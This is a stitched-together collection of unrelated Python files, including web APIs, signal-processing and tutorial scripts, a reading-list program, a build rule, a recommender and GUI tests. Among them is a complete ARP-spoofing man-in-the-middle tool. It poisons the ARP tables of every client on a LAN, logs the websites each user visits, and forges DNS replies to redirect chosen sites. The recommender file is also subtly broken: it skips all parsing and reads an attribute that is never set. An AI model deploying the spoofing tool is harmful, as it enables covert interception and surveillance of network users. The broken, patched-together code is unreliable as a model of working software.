@app.route('/categories/<int:category_id>/questions')
def retrieve_categories_by_id(category_id):
category = Category.query.get(category_id)
selection = Question.query.order_by(
Question.id).filter_by(category=category_id)
current_questions = paginate_questions(request, selection)
if len(current_questions) == 0:
abort(404)
return jsonify({
'success': True,
'questions': current_questions,
'total_questions': len(selection.all()),
'current_category': category.format()
})
@app.route('/quizzes', methods=['POST'])
def play_quiz():
body = request.get_json()
try:
previous_questions = body.get('previous_questions', None)
quiz_category = body.get('quiz_category', None)
quiz_category_id = quiz_category.get('id', -1)
if quiz_category_id == 0:
selection = Question.query.order_by(Question.id).filter(
Question.id.notin_(previous_questions)).all()
else:
category = Category.query.get(quiz_category_id)
if category is None:
raise AbortError(404)
selection = Question.query.order_by(Question.id).filter_by(
category=quiz_category_id).filter(
Question.id.notin_(previous_questions)).all()
selection_length = len(selection)
if selection_length > 0:
selected_question = selection[random.randrange(
0, selection_length)]
return jsonify({
'success': True,
"question": selected_question.format()
})
else:
return jsonify({
"success": True,
"question": None
})
except AbortError as e:
abort(e.code)
except Exception:
abort(422)
@app.errorhandler(404)
def not_found(error):
return jsonify({
"success": False,
"error": 404,
"message": "Resource not found"
}), 404
@app.errorhandler(422)
def unprocessable(error):
return jsonify({
"success": False,
"error": 422,
"message": "unprocessable"
}), 422
return app
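# --- Hedged usage sketch (added for illustration, not in the original file):
# exercising the app above with Flask's built-in test client; assumes the database
# configured by models.setup_db is reachable and seeded.
# app = create_app()
# client = app.test_client()
# print(client.get('/questions?page=1').get_json())
# print(client.post('/quizzes', json={'previous_questions': [],
#                                     'quiz_category': {'id': 0}}).get_json())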
|
"""Custom renderers for DRF."""
import csv
from io import StringIO
from rest_framework import renderers
class CSVRenderer(renderers.BaseRenderer):
"""Custom CSV renderer."""
media_type = "text/csv"
format = "csv"
def render(self, data, media_type=None, renderer_context=None):
with StringIO() as fp:
csvwriter = csv.writer(fp)
for item in data:
csvwriter.writerow(item)
content = fp.getvalue()
return content
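# --- Hedged usage sketch (added for illustration, not in the original file): wiring
# the renderer into a DRF view; each inner list becomes one CSV row. The view name
# is hypothetical.
# from rest_framework.response import Response
# from rest_framework.views import APIView
#
# class ExportView(APIView):
#     renderer_classes = [CSVRenderer]
#     def get(self, request):
#         return Response([["name", "score"], ["alice", 3]])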
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 13 10:07:23 2019
@author: nico
"""
import numpy as np
from scipy import signal as sig
import matplotlib.pyplot as plt
import control
import os
os.system ("clear") # limpia la terminal de python
plt.close("all") #cierra todos los graficos
num = np.array([1/5, 1/5, 1/5, 1/5, 1/5])
den = np.array([1, 0, 0, 0, 0])
z, p, k = sig.tf2zpk(num,den)
print("Z =", z, "\n", "P =", p, "\n", "K =", k, "\n")
ww, hh = sig.freqz(num, den)
ww = ww / np.pi
eps = np.finfo(float).eps
#plt.figure("Filtro FIR")
#plt.subplot(2, 1, 1)
#plt.title('Módulo')
#plt.plot(ww, 20 * np.log10(abs(hh)))
#plt.xlabel('Frequencia normalizada')
#plt.ylabel('Modulo [dB]')
#plt.grid()
#plt.subplot(2, 1, 2)
#plt.title('Fase')
#plt.plot(ww, np.angle(hh))
#plt.xlabel('Frequencia normalizada')
#plt.ylabel('[Rad]')
#plt.grid()
#plt.show()
#plt.tight_layout()
plt.figure("Filtro FIR")
ax1 = plt.subplot(2, 1, 1)
ax1.set_title('Módulo')
ax1.plot(ww, 20 * np.log10(abs(hh)+eps))
ax1.set_xlabel('Frequencia normalizada')
ax1.set_ylabel('Modulo [dB]')
plt.grid()
ax2 = plt.subplot(2, 1, 2)
ax2.set_title('Fase')
ax2.plot(ww, np.angle(hh))
ax2.set_xlabel('Frequencia normalizada')
ax2.set_ylabel('[Rad]')
plt.grid()
plt.show()
plt.tight_layout()
tf = control.TransferFunction(num,den,1)
print(tf)
control.pzmap(tf, Plot=True, title='Pole Zero Map', grid=True)
#plt.figure("Diagramas de polos y ceros")
#plt.plot(z.real, z.imag, 'o')
#plt.plot(p.real, p.imag, 'x')
#plt.xlabel('Re')
#plt.ylabel('Im')
#plt.grid()
#plt.show()
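# --- Hedged check (added for illustration, not in the original script): the 5-tap
# moving average above has the closed-form magnitude
# |H(e^jw)| = |sin(5w/2) / (5 sin(w/2))| (a Dirichlet kernel), so the freqz result
# can be verified directly:
# w = ww[1:] * np.pi   # undo the normalization; skip w = 0, where the ratio is 0/0
# analytic = np.abs(np.sin(5 * w / 2) / (5 * np.sin(w / 2)))
# print(np.allclose(np.abs(hh[1:]), analytic))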
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/5/11 下午8:33
# @Author : Lucas Ma
# @File : defunc
# User-defined functions
def my_abs(x):
if not isinstance(x, (int, float)):
raise TypeError('bad operand type')
if x >= 0:
return x
else:
return -x
print(my_abs(-9))
# To define an empty function that does nothing, use the pass statement. pass keeps
# the syntax valid, so if you have not decided how to implement a function yet,
# you can put a pass there as a placeholder:
def nop():
pass
import math
def move(x, y, step, angle=0):
nx = x + step * math.cos(angle)
ny = y - step * math.sin(angle)
return nx, ny
res = move(100, 100, 60, math.pi / 6)
print(res)
# Function parameters
def power(x, n=2):
s = 1
while n > 0:
n = n - 1
s = s * x
return s
print(power(5, 3))
# Compute a*a + b*b + c*c
def calc(numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
print(calc([1, 2, 3]))
'''
Rewriting the function above with a variadic parameter:
compared with declaring a list or tuple parameter, a variadic parameter just adds a
* before the parameter name. Inside the function, `numbers` arrives as a tuple, so
the body is unchanged, but the caller may now pass any number of arguments,
including zero:
'''
def calc(*numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
print(calc(1, 2, 4))
print(calc(2))
print(calc())
'''
What if you already have a list or tuple and want to call a variadic function?
Prefix the list or tuple with a * to unpack its elements as variadic arguments;
this is the most common idiom:
'''
nums = [1, 2, 3]
print(calc(*nums))
'''
Keyword arguments
Variadic parameters let you pass zero or more positional arguments, automatically
collected into a tuple at call time. Keyword arguments let you pass zero or more
named arguments, automatically collected into a dict inside the function. Example:
'''
def person(name, age, **kw):
print('name:', name, 'age:', age, 'other:', kw)
person('lucas', '24')
# pass in any number of keyword arguments
person('Bob', 35, city='Beijing')
person('Adam', 45, gender='M', job='Engineer')
# As with variadic arguments, you can build a dict first and pass it in as keyword arguments:
extra = {'city': 'Beijing', 'job': 'Engineer'}
person('Jack', 24, city=extra['city'], job=extra['job'])
'''
Named keyword arguments
With plain **kw the caller may pass any keyword arguments whatsoever, and the
function must inspect kw to see what actually arrived. To restrict the accepted
names, use named keyword arguments, e.g. accepting only city and job.
Unlike **kw, named keyword arguments need the special separator *; parameters
after the * are treated as named keyword arguments.
'''
def person(name, age, *, city, job):
print(name, age, city, job)
person('Jack', 24, city='Beijing', job='Engineer')
# If the definition already has a variadic parameter, the named keyword arguments that follow no longer need the special separator *:
def person(name, age, *args, city, job):
print(name, age, args, city, job)
'''
A Python function may be defined with required, default, variadic, keyword, and
named keyword parameters, and all five kinds can be combined. Note, however, that
they must be declared in this order: required, default, variadic, named keyword,
then keyword parameters.
'''
def f1(a, b, c=0, *args, **kw):
print('a =', a, 'b =', b, 'c =', c, 'args =', args, 'kw =', kw)
def f2(a, b, c=0, *, d, **kw):
print('a =', a, 'b =', b, 'c =', c, 'd =', d, 'kw =', kw)
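# Example calls (added for illustration), showing how the five kinds combine:
f1(1, 2)                        # a = 1 b = 2 c = 0 args = () kw = {}
f1(1, 2, 3, 'a', 'b', x=99)     # a = 1 b = 2 c = 3 args = ('a', 'b') kw = {'x': 99}
f2(1, 2, d=99, ext=None)        # a = 1 b = 2 c = 0 d = 99 kw = {'ext': None}
args = (1, 2, 3, 4)
kw = {'d': 99, 'x': '#'}
f1(*args, **kw)                 # a = 1 b = 2 c = 3 args = (4,) kw = {'d': 99, 'x': '#'}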
|
def add_books():
title = input("Title: ").strip().title()
author = input("Author: ").strip().title()
year = input("Publishing year: ").strip()
book = f"{title},{author},{year},Not read\n"
    with open('books.csv', 'a') as reading_list:
reading_list.write(book)
def get_all_books():
books = []
with open("books.csv", "r") as reading_list:
for book in reading_list:
title, author, year, read_status = book.strip().split(",")
books.append({
'title' : title,
'author': author,
'year' : year,
'read': read_status
})
return books
def show_book(books):
print()
for book in books:
print(f"{book['title']}, by {book['author']} ({book['year']}) - {book['read']}")
print()
def find_books():
matching_books = []
reading_list = get_all_books()
search_term = input("Enter the title name to search the book : ").strip().lower()
for book in reading_list:
if search_term in book['title'].lower():
matching_books.append(book)
return matching_books
def delete_books():
    books = get_all_books()
    matching_books = find_books()
    if matching_books:
        books.remove(matching_books[0])
        with open("books.csv", "w") as reading_list:
            for book in books:
                reading_list.write(f"{book['title']},{book['author']},{book['year']},{book['read']}\n")
    else:
        print("Sorry, we didn't find any books matching that title.")
def mark_book_as_read():
    books = get_all_books()
    matching_books = find_books()
    if matching_books:
        index = books.index(matching_books[0])
        books[index]['read'] = 'Read'
        with open("books.csv", "w") as reading_list:
            for book in books:
                reading_list.write(f"{book['title']},{book['author']},{book['year']},{book['read']}\n")
    else:
        print("No matching books found")
menu_prompt = """Please enter one of the following options:
- 'a' to add a book
- 'd' to delete a book
- 'l' to list the books
- 'r' to mark a book as read
- 's' to search for a book
- 'q' to quit
What would you like to do? """
user_input = input(menu_prompt).strip().lower()  # strip whitespace and lowercase so stray spaces or capitals don't matter
while user_input != 'q':
if user_input == 'a':
add_books()
elif user_input == 'd':
delete_books()
elif user_input == 'l':
reading_list = get_all_books()
if reading_list:
show_book(reading_list)
else:
print("List is empty")
elif user_input == 'r':
mark_book_as_read()
elif user_input == 's':
matching_books = find_books()
if matching_books:
show_book(matching_books)
else:
print("No matching books found")
else:
print("Input is not valid, please enter again.")
user_input = input(menu_prompt).strip().lower()
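# --- Hedged sketch (added for illustration, not in the original script): the manual
# split(",") above breaks if a title itself contains a comma; the csv module handles
# quoting. A drop-in variant of get_all_books, assuming the same four columns:
# import csv
# FIELDS = ['title', 'author', 'year', 'read']
# def get_all_books():
#     with open('books.csv', newline='') as reading_list:
#         return list(csv.DictReader(reading_list, fieldnames=FIELDS))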
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import json
import logging
from dataclasses import dataclass
from pants.backend.go.subsystems.golang import GolangSubsystem
from pants.backend.go.util_rules import go_bootstrap
from pants.backend.go.util_rules.go_bootstrap import GoBootstrap, compatible_go_version
from pants.core.util_rules.environments import EnvironmentTarget
from pants.core.util_rules.system_binaries import (
BinaryNotFoundError,
BinaryPathRequest,
BinaryPaths,
BinaryPathTest,
)
from pants.engine.internals.selectors import Get, MultiGet
from pants.engine.process import Process, ProcessResult
from pants.engine.rules import collect_rules, rule
from pants.util.frozendict import FrozenDict
from pants.util.logging import LogLevel
from pants.util.strutil import bullet_list, softwrap
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class GoRoot:
"""Path to the Go installation (the `GOROOT`)."""
path: str
version: str
_raw_metadata: FrozenDict[str, str]
def is_compatible_version(self, version: str) -> bool:
"""Can this Go compiler handle the target version?"""
return compatible_go_version(compiler_version=self.version, target_version=version)
@property
def full_version(self) -> str:
return self._raw_metadata["GOVERSION"]
@property
def goos(self) -> str:
return self._raw_metadata["GOOS"]
@property
def goarch(self) -> str:
return self._raw_metadata["GOARCH"]
@rule(desc="Find Go binary", level=LogLevel.DEBUG)
async def setup_goroot(
golang_subsystem: GolangSubsystem, go_bootstrap: GoBootstrap, env_target: EnvironmentTarget
) -> GoRoot:
search_paths = go_bootstrap.go_search_paths
all_go_binary_paths = await Get(
BinaryPaths,
BinaryPathRequest(
search_path=search_paths,
binary_name="go",
test=BinaryPathTest(["version"]),
),
)
if not all_go_binary_paths.paths:
raise BinaryNotFoundError(
softwrap(
f"""
Cannot find any `go` binaries using the option `[golang].go_search_paths`:
{list(search_paths)}
To fix, please install Go (https://golang.org/doc/install) with the version
{golang_subsystem.minimum_expected_version} or newer (set by
`[golang].minimum_expected_version`). Then ensure that it is discoverable via
`[golang].go_search_paths`.
"""
)
)
# `go env GOVERSION` does not work in earlier Go versions (like 1.15), so we must run
# `go version` and `go env GOROOT` to calculate both the version and GOROOT.
version_results = await MultiGet(
Get(
ProcessResult,
Process(
(binary_path.path, "version"),
description=f"Determine Go version for {binary_path.path}",
level=LogLevel.DEBUG,
cache_scope=env_target.executable_search_path_cache_scope(),
),
)
for binary_path in all_go_binary_paths.paths
)
invalid_versions = []
for binary_path, version_result in zip(all_go_binary_paths.paths, version_results):
try:
_raw_version = version_result.stdout.decode("utf-8").split()[
2
] # e.g. go1.17 or go1.17.1
_version_components = _raw_version[2:].split(".") # e.g. [1, 17] or [1, 17, 1]
version = f"{_version_components[0]}.{_version_components[1]}"
except IndexError:
raise AssertionError(
f"Failed to parse `go version` output for {binary_path}. Please open a bug at "
f"https://github.com/pantsbuild/pants/issues/new/choose with the below data."
f"\n\n"
f"{version_result}"
)
if compatible_go_version(
compiler_version=version, target_version=golang_subsystem.minimum_expected_version
):
env_result = await Get( # noqa: PNT30: requires triage
ProcessResult,
Process(
(binary_path.path, "env", "-json"),
description=f"Determine Go SDK metadata for {binary_path.path}",
level=LogLevel.DEBUG,
cache_scope=env_target.executable_search_path_cache_scope(),
env={"GOPATH": "/does/not/matter"},
),
)
sdk_metadata = json.loads(env_result.stdout.decode())
return GoRoot(
path=sdk_metadata["GOROOT"], version=version, _raw_metadata=FrozenDict(sdk_metadata)
)
logger.debug(
f"Go binary at {binary_path.path} has version {version}, but this "
f"repository expects at least {golang_subsystem.minimum_expected_version} "
"(set by `[golang].expected_minimum_version`). Ignoring."
)
invalid_versions.append((binary_path.path, version))
invalid_versions_str = bullet_list(
f"{path}: {version}" for path, version in sorted(invalid_versions)
)
raise BinaryNotFoundError(
softwrap(
f"""
Cannot find a `go` binary compatible with the minimum version of
{golang_subsystem.minimum_expected_version} (set by `[golang].minimum_expected_version`).
Found these `go` binaries, but they had incompatible versions:
{invalid_versions_str}
To fix, please install the expected version or newer (https://golang.org/doc/install)
and ensure that it is discoverable via the option `[golang].go_search_paths`, or change
            `[golang].minimum_expected_version`.
"""
)
)
def rules():
return (
*collect_rules(),
*go_bootstrap.rules(),
)
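# --- Hedged sketch (added for illustration, not part of the Pants source): the
# version parsing inlined in setup_goroot above, pulled out as a hypothetical
# helper. Input is raw `go version` output; the result keeps major.minor only.
# def parse_go_version(stdout: str) -> str:
#     raw = stdout.split()[2]            # e.g. "go1.17.1"
#     components = raw[2:].split(".")    # ["1", "17", "1"]
#     return f"{components[0]}.{components[1]}"
# assert parse_go_version("go version go1.17.1 linux/amd64") == "1.17"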
|
#!/usr/bin/env python
#-*-coding:utf-8-*-
# @File:Segment.py
# @Author: Michael.liu
# @Date:2019/2/12
# @Desc: NLP Segmentation ToolKit - Hanlp Python Version
import os
import json
import random
import math
class FirstRec:
"""
初始化函数
seed:产生随机的种子
k: 选取的近邻用户个数
nitems 推荐电影
"""
def __init__(self, file_path, seed, k, n_items):
self.file_path = file_path
# self.users_1000 = self.__select_1000_users()
self.seed = seed
self.k = k
self.n_items = n_items
self.train, self.test = self.__load_and_split_data()
def __load_and_split_data(self):
train = dict()
test = dict()
if os.path.exists("../data/train.json") and os.path.exists("../data/test.json"):
print("从文件中加载训练和测试集")
train = json.load(open("../data/train.json"))
test = json.load(open("../data/test.json"))
print("从文件中加载数据完成")
# print(train)
else:
random.seed(self.seed)
for file in os.listdir(self.file_path):
one_path = "{}/{}".format(self.file_path, file)
print("{}".format(one_path))
with open(one_path, "r") as fp:
movieID = fp.readline().split(":")[0]
for line in fp.readlines():
continue
userID, rate, _ = line.split(",")
# 判断用户是否在所选择的1000个用户中
if userID in self.users_1000:
if random.randint(1, 50) == 1:
test.setdefault(userID, {})[movieID] = int(rate)
else:
train.setdefault(userID, {})[movieID] = int(rate)
print("加载完成>>>>>>>>>>>>>>>>>>>")
json.dump(train, open("data/train.json", "w"))
json.dump(test, open("data/test.json", "w"))
return train, test
def pearson(self, rating1, rating2):
sum_xy = 0
sum_x = 0
sum_y = 0
sum_x2 = 0
sum_y2 = 0
num = 0
for key in rating1.keys():
if key in rating2.keys():
num += 1
x = rating1[key]
y = rating2[key]
sum_xy += x * y
sum_x += x
sum_y += y
sum_x2 += math.pow(x, 2)
sum_y2 += math.pow(y, 2)
if num == 0:
return 0
denominator = math.sqrt(sum_x2 - math.pow(sum_x, 2) / num) * math.sqrt(sum_y2 - math.pow(sum_y, 2) / num)
if denominator == 0:
return 0
else:
return (sum_xy - (sum_x * sum_y) / num) / denominator
def recommend(self, userID):
neighborUser = dict()
for user in self.train.keys():
if userID != user:
distance = self.pearson(self.train[userID], self.train[user])
neighborUser[user] = distance
        # sort neighbours by descending similarity
newNU = sorted(neighborUser.items(), key=lambda k: k[1], reverse=True)
movies = dict()
for (sim_user, sim) in newNU[:self.k]:
for movieID in self.train[sim_user].keys():
movies.setdefault(movieID, 0)
movies[movieID] += sim * self.train[sim_user][movieID]
newMovies = sorted(movies.items(), key=lambda k: k[1], reverse=True)
return newMovies
if __name__ == "__main__":
file_path = "../data/"
seed = 30
k = 15
n_items = 20
f_rec = FirstRec(file_path, seed, k, n_items)
r = f_rec.pearson(f_rec.train["195100"], f_rec.train["1547579"])
print("195100 和 1547579 的皮尔逊相关系数为:{}".format(r))
result = f_rec.recommend("195100")
print("为用户ID为:195100的用户推荐的电影为:{}".format(result))
print("Hello World!")
|
from typing import List
from fastapi import FastAPI, Depends, Body
from sqlalchemy.orm import Session
from app.database import get_database
from app import crud
from app import types
#API main object
app = FastAPI()
#root endpoint
@app.get('/')
def root():
return {
'message':'Welcome on JM mobile application API'
}
#get messages endpoint
@app.get('/messages/', response_model=List[types.Message])
def read_messages(skip: int = 0, limit: int = 100, database: Session = Depends(get_database)):
messages = crud.get_messages(database=database, skip=skip, limit=limit)
return messages
#get users endpoint
@app.get('/users/', response_model=List[types.User])
def read_users(skip: int = 0, limit: int = 100, database: Session = Depends(get_database)):
users = crud.get_users(database=database, skip=skip, limit=limit)
return users
@app.post('/register/')
def register(user: types.User = Body(..., embed=True), database: Session = Depends(get_database)):
exist_user = crud.get_user_by_phone_number(database, user.phone_number)
if exist_user:
return {
'text':'user already exists!',
'user':exist_user
}
db_user = crud.create_user(database, user)
exist_user = crud.get_user_by_phone_number(database, user.phone_number)
return {
'text': 'user created successfully!',
'user': exist_user
}
@app.post('/login/')
def login(phone_number: str = Body(..., embed=True), database: Session = Depends(get_database)):
exist_user = crud.get_user_by_phone_number(database, phone_number)
if exist_user:
return {
'text':'login successfully!',
'user':exist_user
}
return {
        'text': 'invalid credentials!'
}
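# --- Hedged usage sketch (added for illustration, not in the original file):
# exercising the endpoints above with FastAPI's TestClient; assumes the database
# behind get_database is reachable.
# from fastapi.testclient import TestClient
# client = TestClient(app)
# print(client.get('/').json())
# print(client.post('/login/', json={'phone_number': '+33600000000'}).json())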
|
import numpy as np
import pandas as pd
from sklearn.cluster import KMeans
import matplotlib.pyplot as plt
import matplotlib.collections
def get_similar_producers(budget_revenue_dict, producer_name):
producers_list = budget_revenue_dict["producer_list"];
producer_index_value = producers_list.index(producer_name)
# Creates a data frame consisting of revenue and budget of all the producers for k-means clustering
cluster_data_frame = pd.DataFrame()
cluster_data_frame.insert(0, "budg_of_sel_gen", budget_revenue_dict["budg_of_sel_gen"])
cluster_data_frame.insert(1, "rev_of_sel_gen", budget_revenue_dict["rev_of_sel_gen"])
#creates a k-means cluster
kmeans = KMeans(n_clusters=2).fit(cluster_data_frame)
centroids = kmeans.cluster_centers_
plt.scatter(cluster_data_frame['budg_of_sel_gen'], cluster_data_frame['rev_of_sel_gen'], c= kmeans.labels_.astype(float), s=50, alpha=0.5)
plt.scatter(centroids[:, 0], centroids[:, 1], c='red', s=50)
cluster_map = pd.DataFrame()
cluster_map['data_index'] = cluster_data_frame.index.values
    # Finds the cluster of every producer
cluster_map['cluster'] = kmeans.labels_
# Gets the cluster of input producers
cluster_num=cluster_map['cluster'][producer_index_value]
X=[]
for i in range(0,len(producers_list)):
Z = []
Z.append(budget_revenue_dict["budg_of_sel_gen"][i])
Z.append(budget_revenue_dict["rev_of_sel_gen"][i])
X.append(Z)
    # Distance from every producer's point to the chosen cluster's centroid
    d = kmeans.transform(X)[:, cluster_num]
    # Indexes of the 10 producers nearest to that centroid
    producer_indexes = np.argsort(d)[:10]
return producer_indexes
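# --- Hedged usage sketch (added for illustration, not in the original file): a toy
# call with a fabricated budget/revenue dict whose keys mirror those read above.
# toy = {
#     "producer_list": ["p0", "p1", "p2", "p3"],
#     "budg_of_sel_gen": [1.0, 1.1, 9.0, 9.2],
#     "rev_of_sel_gen": [2.0, 2.2, 8.5, 9.0],
# }
# print(get_similar_producers(toy, "p0"))  # indexes sorted by distance to p0's cluster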
|
from setuptools import setup, find_packages
import vds
setup(
name='vds',
version=vds.__version__,
url='https://github.com/maet3608/vft-data-sanitizer',
author='Stefan Maetschke',
author_email='stefan.maetschke@gmail.com',
description='Remove sensitive information from visual field test data',
packages=find_packages(),
install_requires=[],
)
|
#!/usr/bin/env python3
import netfilterqueue
import scapy.all as scapy
from scapy.layers import http
import argparse
import os
import re
from threading import Thread
from time import asctime, sleep
connected_clients = []
blocked_websites = []
file_name = re.sub(r"\s\d\d:\d\d:\d\d", "", asctime())
log_file = open(os.path.abspath(os.getcwd()) + "/Logs/" + file_name + ".txt", "a")
def get_arguments():
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", dest="target", help="Use to specify target IP/IP Range.")
parser.add_argument("-g", "--gateway", dest="gateway_ip", help="Use to specify the gateway IP.")
options = parser.parse_args()
if not options.target:
parser.error("[-] Please specify a target IP/IP Range, use --help for more info.")
if not options.gateway_ip:
parser.error("[-] Please specify the gateway IP, use --help for more info.")
return options
def scan(ip):
global connected_clients
while True:
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
clients_list = []
for element in answered_list:
client_dict = {"ip":element[1].psrc , "mac":element[1].hwsrc}
clients_list.append(client_dict)
connected_clients = [] + clients_list
print_scan_result(connected_clients)
print("\rNumber of Connected Clients: ", len(connected_clients))
sleep(120)
def print_scan_result(results_list):
print("IP\t\t\tMAC Address\n-----------------------------------------")
for client in results_list:
print(client["ip"]+"\t\t"+client["mac"])
def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
return answered_list[0][1].hwsrc
def connect_clients(gateway_ip):
global connected_clients
gateway_mac = get_mac(gateway_ip)
try:
while True:
for client in connected_clients:
packet_1 = scapy.ARP(op=2, pdst=client["ip"], hwdst=client["mac"], psrc=gateway_ip)
packet_2 = scapy.ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=client["ip"])
scapy.send(packet_1,verbose=False)
scapy.send(packet_2,verbose=False)
sleep(2)
except:
print("[!] Restoring ARP Tables......")
for client in connected_clients:
packet_1 = scapy.ARP(op=2, pdst=client["ip"], hwdst=client["mac"], psrc=gateway_ip, hwsrc=gateway_mac)
packet_2 = scapy.ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=client["ip"], hwsrc=client["mac"])
scapy.send(packet_1, count=4, verbose=False)
scapy.send(packet_2, count=4, verbose=False)
def read_blocked_websites():
global blocked_websites
blocked_website_list_file = open("website_list.txt", "r")
for each_website in blocked_website_list_file:
blocked_websites.append(each_website.strip("\n"))
def write_log(url):
log_file.write(asctime()+"\t"+url+"\n\n")
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(http.HTTPRequest):
if scapy_packet[scapy.TCP].dport == 80:
url = "User at ip "+str(scapy_packet[scapy.IP].src) + " Accessed: "+str(scapy_packet[http.HTTPRequest].Host) #+ str(scapy_packet[http.HTTPRequest].Path)
#print(url)
write_log(url)
if scapy_packet.haslayer(scapy.DNSRR):
website_requested = scapy_packet[scapy.DNSQR].qname.decode()
for name in blocked_websites:
if name in website_requested:
print("[+] Blocking Website:",website_requested)
answer = scapy.DNSRR(rrname=website_requested, rdata="10.0.2.14")
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].ancount = 1
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].chksum
del scapy_packet[scapy.UDP].len
packet.set_payload(bytes(scapy_packet))
packet.accept()
def filter_traffic():
print("[+] Reading blocked website list")
try:
read_blocked_websites()
except:
print("[-] Error Occurred, Unable to read file")
else:
print("[+] Website list successfully read")
print(blocked_websites)
while True:
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
try:
options = get_arguments()
scan_network = Thread(target=scan, args=(options.target,), daemon=True)
route_clients = Thread(target=connect_clients, args=(options.gateway_ip,), daemon=True)
network_filter = Thread(target=filter_traffic, daemon=True)
scan_network.start()
route_clients.start()
network_filter.start()
scan_network.join()
route_clients.join()
network_filter.join()
except KeyboardInterrupt:
gateway_mac = get_mac(options.gateway_ip)
print("[!] Restoring ARP Tables......")
for client in connected_clients:
packet_1 = scapy.ARP(op=2, pdst=client["ip"], hwdst=client["mac"], psrc=options.gateway_ip, hwsrc=gateway_mac)
packet_2 = scapy.ARP(op=2, pdst=options.gateway_ip, hwdst=gateway_mac, psrc=client["ip"], hwsrc=client["mac"])
scapy.send(packet_1, count=4, verbose=False)
scapy.send(packet_2, count=4, verbose=False)
print("[+] ARP Tables Restored")
print("[+] Writing Logs to the Memory...........")
log_file.close()
print("[+] Logs Successfully written.......Quitting....")
|
import sys
import re
def process(line):
    nums = sorted([int(i) for i in re.findall(r',(\d*);', line)])
    l = 0
    out = ""
    for i in nums:
        out += str(i - l) + ","
        l = i
    print(out[:-1])
with open(sys.argv[1],'r') as f:
for line in f:
process(line)
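# Example (added for illustration): a line such as "foo,3;,7;,12;" matches the
# numbers 3, 7 and 12, and the script prints the gaps between them: "3,4,5".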
|
import os
from qtpy import QtWidgets
from pdsview import pdsview, channels_dialog, band_widget
FILE_1 = os.path.join(
'tests', 'mission_data', '2m132591087cfd1800p2977m2f1.img')
FILE_2 = os.path.join(
'tests', 'mission_data', '2p129641989eth0361p2600r8m1.img')
FILE_3 = os.path.join(
'tests', 'mission_data', '1p190678905erp64kcp2600l8c1.img')
FILE_4 = os.path.join(
'tests', 'mission_data', 'h58n3118.img')
FILE_5 = os.path.join(
'tests', 'mission_data', '1p134482118erp0902p2600r8m1.img')
FILE_6 = os.path.join(
'tests', 'mission_data', '0047MH0000110010100214C00_DRCL.IMG')
test_files = [FILE_1, FILE_2, FILE_3, FILE_4, FILE_5, FILE_6]
FILE_1_NAME = '2m132591087cfd1800p2977m2f1.img'
FILE_2_NAME = '2p129641989eth0361p2600r8m1.img'
FILE_3_NAME = '1p190678905erp64kcp2600l8c1.img'
FILE_4_NAME = 'h58n3118.img'
FILE_5_NAME = '1p134482118erp0902p2600r8m1.img'
FILE_6_NAME = '0047MH0000110010100214C00_DRCL.IMG'
class TestBandWidgetModel(object):
test_images = pdsview.ImageSet(test_files)
window = pdsview.PDSViewer(test_images)
channels_model = channels_dialog.ChannelsDialogModel(window)
model = band_widget.BandWidgetModel(channels_model, 0, 'Test')
def test_init1(self):
test_name = 'Test1'
test_rgb_index = 0
model = band_widget.BandWidgetModel(
self.channels_model, test_rgb_index, test_name)
assert isinstance(model.max_alpha, float)
assert model.max_alpha == 100.
assert isinstance(model.min_alpha, float)
assert model.min_alpha == 0.
assert model._views == set()
assert model.name == test_name
assert model.rgb_index == test_rgb_index
assert model.channels_model == self.channels_model
assert model._index == 0
assert model._alpha_value == model.max_alpha
def test_init2(self):
test_name = 'Test2'
test_rgb_index = 2
model = band_widget.BandWidgetModel(
self.channels_model, test_rgb_index, test_name)
assert isinstance(model.max_alpha, float)
assert model.max_alpha == 100.
assert isinstance(model.min_alpha, float)
assert model.min_alpha == 0.
assert model._views == set()
assert model.name == test_name
assert model.rgb_index == test_rgb_index
assert model.channels_model == self.channels_model
assert model._index == 2
assert model._alpha_value == model.max_alpha
def test_index(self):
assert self.model.index == self.model._index
def test_selected_image(self):
expected_selected_image = self.channels_model.images[self.model.index]
assert self.model.selected_image == expected_selected_image
def test_update_index(self):
assert self.model.index == 0
new_index = 1
new_selected_image = self.channels_model.images[new_index]
self.model.update_index(new_index)
assert self.model.index == new_index
assert self.model.selected_image == new_selected_image
new_index = 0
new_selected_image = self.channels_model.images[new_index]
self.model.index = new_index
assert self.model.index == new_index
assert self.model.selected_image == new_selected_image
def test_alpha_value(self):
assert self.model.alpha_value == self.model._alpha_value
self.model.alpha_value = 50.
assert self.model.alpha_value == 50.
self.model.alpha_value = 100.
assert self.model.alpha_value == 100.
class TestBandWidgetController(object):
test_images = pdsview.ImageSet(test_files)
window = pdsview.PDSViewer(test_images)
channels_model = channels_dialog.ChannelsDialogModel(window)
model = band_widget.BandWidgetModel(
channels_model, 0, 'Test')
controller = band_widget.BandWidgetController(model, None)
def test_init(self):
assert self.controller.model == self.model
assert self.controller.view is None
def test_update_index(self):
assert self.model.index == 0
new_index = 1
self.controller.update_index(new_index, True)
assert self.model.index == new_index
new_index = 0
self.controller.update_index(new_index, True)
assert self.model.index == new_index
def test_reset_index(self):
assert self.model.index == 0
new_index = 1
self.model._index = new_index
self.controller.reset_index()
assert self.model.index == 0
def test_update_alpha_value(self):
assert self.model.alpha_value == 100.
self.controller.update_alpha(50.)
assert self.model.alpha_value == 50.
